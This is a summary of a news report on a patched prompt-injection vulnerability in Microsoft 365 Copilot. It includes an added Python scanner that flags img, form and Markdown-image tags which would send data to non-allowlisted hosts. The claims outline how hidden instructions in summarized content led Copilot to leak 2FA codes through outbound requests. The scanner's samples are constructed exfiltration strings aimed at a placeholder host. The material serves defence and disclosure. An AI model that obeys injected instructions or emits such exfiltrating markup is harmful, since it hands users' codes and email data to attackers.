Critical Copilot vulnerability allowed hackers to steal 2FA code from users
Ars Technica AI · Dan Goodin · 2026-06-16
Security researchers disclosed a now-patched maximum-critical prompt injection vulnerability in Microsoft 365 Copilot that let attackers exfiltrate 2FA codes and sensitive email data by embedding malicious instructions in content Copilot was asked to summarize.
Extraction
Topics: prompt-injection, ai-security, llm-vulnerabilities, copilot-security
Claims
- Microsoft patched a maximum-critical vulnerability in M365 Copilot allowing attackers to retrieve 2FA codes and sensitive email data accessible to Copilot.
- The root cause is that LLMs cannot distinguish between legitimate user instructions and malicious instructions embedded in third-party content being processed.
- Attackers bypassed Copilot's guardrails against data exfiltration by wrapping stolen data in markup language constructs and HTML tags such as img and form, triggering outbound web requests to attacker-controlled servers.
- Microsoft and other LLM providers have no fundamental fix for prompt injection and rely on ad hoc guardrails that can be circumvented.
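A defender-side check for the exfiltration channel described in the third claim, as an added example that is not from the article or from Microsoft: it scans assistant output for img and form tags, plus Markdown images, that would make the renderer contact a host outside an allowlist. The allowlist host, the sample strings and all function names are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_HOSTS = {"assets.example.com"}       # assumption: hosts the renderer may fetch from
URL_ATTRS = {"img": "src", "form": "action"}  # the tags named in the claim above
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*<?([^)\s>]+)")  # Markdown image: ![alt](url)

def _blocked(url):
    """True when rendering this URL would contact a host that is not allowlisted."""
    try:
        host = urlparse(url.strip()).hostname
    except ValueError:
        return True                # unparsable URL: fail closed
    if host is None:               # relative path or data: URI, no remote host
        return False
    return host not in ALLOWED_HOSTS

class _TagScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):   # tag and attribute names arrive lowercased
        attr = URL_ATTRS.get(tag)
        url = dict(attrs).get(attr) if attr else None
        if url and _blocked(url):
            self.findings.append((tag, url))

def scan_output(text):
    """Return (kind, url) pairs for constructs that would send a request off-allowlist."""
    scanner = _TagScanner()
    scanner.feed(text)
    scanner.close()
    md = [("markdown-image", u) for u in MD_IMAGE.findall(text) if _blocked(u)]
    return scanner.findings + md

def safe_to_render(text):
    return not scan_output(text)

# Constructed model outputs; the .invalid host stands in for any non-allowlisted server.
SAMPLES = {
    "benign": 'Meeting moved to 3pm. <img src="https://assets.example.com/logo.png">',
    "img": 'Summary done. <IMG SRC="https://collector.invalid/p.gif?d=493201">',
    "form": '<form action="//collector.invalid/submit"><input name="d" value="493201"></form>',
    "markdown": "Done ![status](https://collector.invalid/s.png?d=493201)",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, "render" if safe_to_render(text) else "block", scan_output(text))
```

A scan like this is one more guardrail of the kind the last claim describes; pairing it with a renderer that refuses non-allowlisted fetches outright (for example through a restrictive Content-Security-Policy) keeps a missed pattern from becoming an outbound request.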
Key quotes
Microsoft and other LLM providers have been unable to prevent their products from complying with malicious requests to reveal data. The root cause: AI bots are unable to distinguish between instructions provided by users and those snuck into third-party content the models are summarizing.
With no way to secure this crucial boundary, Microsoft and its peers are left to erect complicated and ad hoc guardrails designed to rein in the consequences of this incurable gullibility.